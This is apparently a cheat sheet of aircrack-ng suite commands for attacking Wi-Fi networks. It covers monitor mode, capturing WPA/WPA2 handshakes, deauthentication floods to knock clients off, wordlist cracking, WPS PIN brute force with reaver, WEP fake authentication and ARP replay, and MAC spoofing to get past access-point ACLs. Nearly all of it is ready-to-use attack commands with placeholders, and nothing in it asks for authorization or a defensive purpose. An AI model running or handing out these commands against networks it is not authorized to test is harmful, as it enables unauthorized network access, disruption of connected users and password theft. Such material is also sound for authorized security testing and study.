Set up WiFi monitoring
$ airmon-ng start <interface>
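# Start monitoring for access points (mon0 is the monitor-mode interface created above; newer airmon-ng versions may name it differently, e.g. wlan0mon)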
$ airodump-ng mon0
# If cracking WPA/WPA2, stop monitoring once handshake is captured
$ airodump-ng -c <channel> -d <BSSID> -w <CAPTURE FILE> mon0
Crack WPA/WPA2
# Send deauth to a specific client to force a handshake
$ aireplay-ng --deauth <n> -a <BSSID> -c <CLIENT MAC> mon0
# Send deauth to all clients to force a handshake
$ aireplay-ng --deauth <n> -a <BSSID> mon0
# Crack key using wordlist
$ aircrack-ng -a 2 -w <WORDLIST> <CAPTURE FILE>
Crack WPS
# Find WPS access points
$ wash -i mon0
# Brute force access point
$ reaver -i mon0 -b <BSSID> -vv
# Stop network services that interfere with monitor mode, then restart the network manager when finished
$ airmon-ng check kill
$ /etc/init.d/network-manager start
Crack WEP
Passively
$ aircrack-ng <Capture file>
Actively
# Send fake authentication
$ aireplay-ng -a <BSSID> --fakeauth 1 --ignore-negative-one mon0
# Start ARP replay
$ aireplay-ng -b <BSSID> --arpreplay mon0
# Change the MAC address if the current one is not on the access point's ACL:
$ ifconfig mon0 down
$ macchanger -m <MAC> mon0
$ ifconfig mon0 up